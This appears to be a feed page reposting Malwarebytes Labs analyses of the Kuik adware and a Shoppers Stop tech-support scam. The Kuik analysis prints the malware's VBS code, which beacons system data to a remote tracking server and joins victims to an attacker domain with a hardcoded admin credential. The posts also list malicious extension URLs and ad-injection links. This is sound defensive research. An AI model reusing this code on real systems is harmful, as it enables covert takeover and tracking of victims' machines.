The best practice is to have shortcuts for the websites that you use to transmit personal or financial data, rather then clicking on links sent to you by mail or found by other means. At first contact, the things to check on a website that require entering personal information or credentials are the following:

  • Is there a green padlock in the address bar?
  • Does the address in the browser’s address bar match your expectations?
  • Is there an EV certificate or not?

Only when you are satisfied that the website belongs to the domain of the company that you wished to pay a visit, enter your credentials or personal data.

Stay safe!

The post HTTPS: why the green padlock is not enough appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Kuik: a simple yet annoying piece of adware

Malwarebytes - Tue, 05/08/2018 - 16:00

Some pieces of malware can be so simple—and yet such a pain to get rid of—especially when they start interfering with your system’s configuration. This much is true for the Kuik adware program, which surprised us all by forcing affected machines to join a domain controller.

The perpetrators are using this unusual technique to push Google Chrome extensions and coin miner applications to their victims. In this blog, we’ll provide technical analysis of this adware and custom removal instructions.

Technical description

Stage 1 – .NET installer

0ba20fee958b88c48f3371ec8d8a8e5d

The first stage is written in .NET with an icon imitating the Adobe Flash Player. This is typical of bundlers that promise to update software components but also add their own code to the original installer.

After opening with a dotNet decompiler (i.e. dnSpy), we found that the project’s original name was WWVaper.

It has three resources inside:

  • a certificate (svr.crt)
  • a legitimate Flash (decoy)
  • a next stage component (upp.exe)

The certificate:

-----BEGIN CERTIFICATE----- MIIEZjCCA06gAwIBAgIJAPywkVD7m/9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNV BAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoM DEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0 QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczEL MAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMG A1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEW EHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB AQDMohZZUrsJOqXS1/eTpGGOMDxEE+YmRLmSU5h/K4tmnkr7Tv9cukICp/Xxnrci 5ONLdqgQFH1xLxLa6Xo+2X075NS0VjfMPx9WvYPSZ/T7uQQhb8Mc+ojjNoHK0JbD oPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55+aWAdPSIDcdqxMt1uFOcF0DY4y vHNpFw1xsjpYuvw1/MvwITr3A+PdKN9TIMzDgbXTZEtc7rWDah4HtIYSJZ2xwIcH qp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eX N6erGBkM7VTfJ5yM9Pxfcu+hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU 3F/U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F/U3InMEiuduPEMMAkG A1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3 LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5t ZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgB hvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcN AQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVm AC+3h1huSyqxYGbJQ8J3wLOYRZH+N5GOZUvjwrU+NY5KurWbMj6USMfsWfnnSXQi 0ADyjYZqtPMmIaIK86yPx4t+3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX 2g1YJAnjnq/9Ilt3MOCEpoCnUz5E+bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ0 2zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx+F3mepR01UMaiwEBDGIeSWX +joBVMKdqhFu9zChlN0dW0hbViIm+gDYsCQ= -----END CERTIFICATE-----

Details of the certificate:

The certificate points to a DNS name of yahoo.com. However, the certification path is invalid:

The .NET installer is responsible for installing the malicious certificate and other components. First, it enumerates the network interfaces and adds collected IPs to the list:

Then, it adds a new IP as a DNS (18.219.162.248) to the collected interfaces. It also installs its own certificate (svr.crt):

Stage 2 – upp.exe

3a13b73f823f081bcdc57ea8cc3140ac

This application is an installer bundle that is not obfuscated. Inside, we found a cabinet file:

It contains other modules to be dropped:

The application “install.exe” is deployed with the “setup.bat” as a parameter.

Stage 3 – unpacked components from the cabinet

The application install.exe is basic. Its only role is to run the next process in elevated mode. Below, you can see its main function:

The script setup.bat deploys another component named SqadU9FBEV.bat:

It delays execution by pinging 127.0.0.1. Then, it runs the second encoded script, giving it a campaign ID as a parameter:

The next element deployed is an encoded VBS script:

After decoding it (with this decoder), we saw this script in clear: NYkjVVXepl.vbs. We also saw that it fingerprints the system and beacons to a server:

Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem") for each System in SystemSet winVer = System.Caption next Function trackEvent(eventName, extraData) Set tracking = CreateObject("MSXML2.XMLHTTP") tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False tracking.send err.clear End Function

The interesting fragment is about adding the infected computer to a domain:

SET objNetwork = CREATEOBJECT("WScript.Network") strComputer = objNetwork.ComputerName SET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\\" & strComputer & "\root\cimv2:Win32_ComputerSystem.Name='" & strComputer & "'") ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.com\administrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE) If (ReturnValue 0) Or (err.number 0) Then trackEvent "join-domain-failed", ReturnValue WScript.Quit 1 Else trackEvent "join-domain-success", Null WScript.Quit 0 End IF Payloads

There are a range of payloads being used by this program, but bogus Chrome extensions seem to be a particular favorite. In addition, some coin miners are being served:

Removal

Malwarebytes users (version 3.x) can remove this threat from their system by running a full scan. The removal includes unjoining the malicious domain controller to restore your machine to its original state.

Indicators of compromise

Kuik

b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686 990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e

Chrome extensions

d-and-h[.]com/fljlngkbcebmlpdlojnndahifaocnipb.crx d-and-h[.]com/123.crx d-and-h[.]com/jpfhjoeaokamkacafjdjbjllgkfkakca.crx d-and-h[.]com/mmemdlochnielijcfpmgiffgkpehgimj.crx kuikdelivery[.]com/emhifpfmcmoghejbfcbnknjjpifkmddc.crx tripan[.]me/kdobijehckphahlmkohehaciojbpmdbp.crx

Payloads

92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B751 33D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB735968501268 7889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD 761D62A22AE73307C679B096030BF0EEC93555E13DC820931519183CAA9F1B2A 871AD057247C023F68768724EBF23D00EF842F0B510A3ACE544A8948AE775712

The post Kuik: a simple yet annoying piece of adware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Shoppers Stop tech scam draws from thousands of forced ad injections

Malwarebytes - Tue, 05/08/2018 - 13:25

These days, there are a lot of browser locker campaigns fueled by malvertising or redirection from hacked sites. But the Shoppers Stop tech scam campaign is actually a bit of both, using compromised sites injected with advertising code that redirects users to other threats, including tech support scams, via malvertising.

We believe those ad injections came from pirated CMS themes. Normally, these are WordPress themes that people typically have to pay to download. Instead, they are offered for free, with a bonus bundle of malicious code.

One aspect we noticed as part of the redirection mechanism was an online shopping portal registered to domains with suspicious TLDs such as .trade, .accountant, .ml that quickly rotate to make blacklisting approaches futile. However, using that same artifact, we were able to flag other browser locker incidents for this particular campaign.

The browlock

The browser locker used in this campaign is a spin-off of the Google Chrome Safebrowing warning. The scammers have added scare tactics to it (e.g. Hard Drive Safety Delete Starting in: 5:00 minutes), as well as authentication pop-ups that prevent the user from closing the browser tab or window.

In this template, the crooks have not bothered with changing the IP address (supposedly of their victim), which still belongs to the original creator of that page, located somewhere in India. The toll-free number, dynamically populated both on the page and the URL, is what the scammers hope potential victims will dial.

Traffic

As mentioned earlier, the number one vector of traffic to these browser locker pages is advertising—more precisely, malvertising. Perpetrators can spend a small budget and attract a fair amount of visits through one of many ad networks. More and more, we are seeing ad platforms ensure that visitors are legitimate and not bots or others using anonymous proxies.

In some cases, this ‘lead funneling’ is doubled by the use of a traffic distribution system (TDS). Here’s an example we captured via the well-documented BlackTDS, redirecting users to ad networks and eventually to the browlock.

BlackTDS has been the source of many browser lockers that have been caught by other researchers as well. For example, on March 29, Vitali Kremez reported an infection chain to a browlock started via smarttraffics[.]ml.

Another instance of the same threat was found as part of an ongoing campaign of compromised websites injected with ad network code. There have been reports from site owners since late last year, but the trend has increased recently.

Denis Sinegubko from Sucuri noted that an ad script with the same ID was injected into over 2,000 websites and drew the conclusion that this was not a case of webmasters using ads for monetization, but rather unwanted ad injections into their CMS. Using the Source Code Search Engine PublicWWW, we found thousands of websites with the same ad codes:

For several weeks now, we have reproduced numerous infection chains to exploit kits, browlocks, and other scams via those injected ads.

//go.oclaserver[.]com/apu.php?zoneid=removed //go.mobtrks[.]com/notice.php?p=removed&interstitial=1 //go.mobisla[.]com/notice.php?p=removed&interactive=1&pushup=1 //defpush[.]com/ntfc.php?p=removed

The server side PHP code (WP-VCD malware) used to load those ads can be seen below. Thanks to our friends at Sucuri for sharing it.

Sucuri’s SiteCheck detects these server-side injections as rogueads.unwanted_ads. The leading cause for these injections are Nulled themes, pirated copies of paid-for CMS themes. The free lunch often comes with backdoors, lack of future updates, and of course violating licensing and copyright laws.

In the following traffic capture (thanks Baber Pervez), we notice the ad injection leading to a malicious redirection chain via the following sequence:

  • dreams-al[.]com (Compromised site)
    • oclasrv[.]com (PropellerAds ad network)
      • deloton[.]com (PropellerAds ad network)
        • xml.adhunter[.]media (XML feed)
          • updating23001.accountant (Shoppers Stop Redirector)
            • techno59033.download (Browlock)

We have observed the same pattern (or similar pattern) from many sites that had been injected with the ad code snippet.

Redirector

The redirector page acts as a gateway to the browser locker. On the surface, it is an online shopping store called Shoppers Stop, offering merchandise for men and women. Shoppers Stop is also the name of a well-known Indian department store chain with over 83 outlets across the country. We believe the scammers may have been using that name to set up either a fake online store or a demo (many scammers are also into website design).

https://updating23001[.]accountant/men-shop

This domain is itself a clone of goshopper[.]info, which was registered via privacy protection on 2017-10-27 and is now parked:

However, in these malicious redirections, the online shopping site is purely used as a redirection mechanism, which is done in such a way that victims will not actually view any of the content. The redirection is done via 301 redirect, also known as a permanent redirect, typically used for SEO purposes by website owners that have moved their property to another (permanent) location.

location: https://techno59033[.]download/TollFree1-877-670-2749

Performing a search on the address provided in the contact page gives us a lead about a .com domain called e-storekart[.]com created on November 7, 2017. While there may not seem to be anything special about it (it is yet another clone), its whois information provides us a bit more information than the other domains we had cataloged before.

e-storekart

This domain was one of the few Shoppers Stop templates that didn’t have a completely anonymized whois. Querying on the string bhushan, we identified multiple other domains ranging from support sites for printers, help with email, web design, fashion, and more. Many of those domains no longer exist or have already been parked.

But even inactive domains can provide some valuable information. For example, we retrieved an archived copy of antivirustechies[.]us that shows it used to be a “legitimate” tech support page for several different antivirus products.

However, the legitimacy of this company was quickly undermined after a few searches for its phone number. It is associated with many complaint reports indicating that people were cold called with the usual scare tactics (fake Microsoft support):

Additional evidence comes in the form of a browser-locker template with that exact phone number on a page hosted at palmreader[.]website/1-800-245-9970/. If you recall, the browser locker depicted at the beginning of this article is very much the same. The URL contains the phone number in its path, and the fake Safebrowsing template is similar as well.

The registration date for that domain goes back to late August 2017. A couple of other phone numbers are also used here, and hardcoded in the URI path, rather than being generated via an API on-the-fly.

To summarize, the same scammer group that used the Shoppers Stop template late last year has already registered a tech support domain (antivirustechies[.]us) and a phone number with the same type of browser locker as used in their Shoppers Stop campaign.

While it can be tricky to link threats based on material that could have been stolen from others, this information can also be helpful in discovering interesting connections to additional web properties associated with fraudulent activities.

The Shoppers Stop tech support scam is among the top campaigns we are tracking (trailing just behind the .TK and .CLUB campaigns). It’s getting a lot of traffic leads from a large number of sites that have been injected with ads, on top of its other malvertising chains.

Malwarebytes users are protected against this threat thanks to domain blocks on oclasrv[.]com and deloton[.]com. We have also reported the advertising IDs we were able to collect to PropellerAds, and the malicious redirector domains/browlocks to CloudFlare.

Indicators of compromise

A list of the domains used for the browser lockers can be found here.

The post Shoppers Stop tech scam draws from thousands of forced ad injections appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Pages

Subscribe to Furiously Eclectic People aggregator - Techie Feeds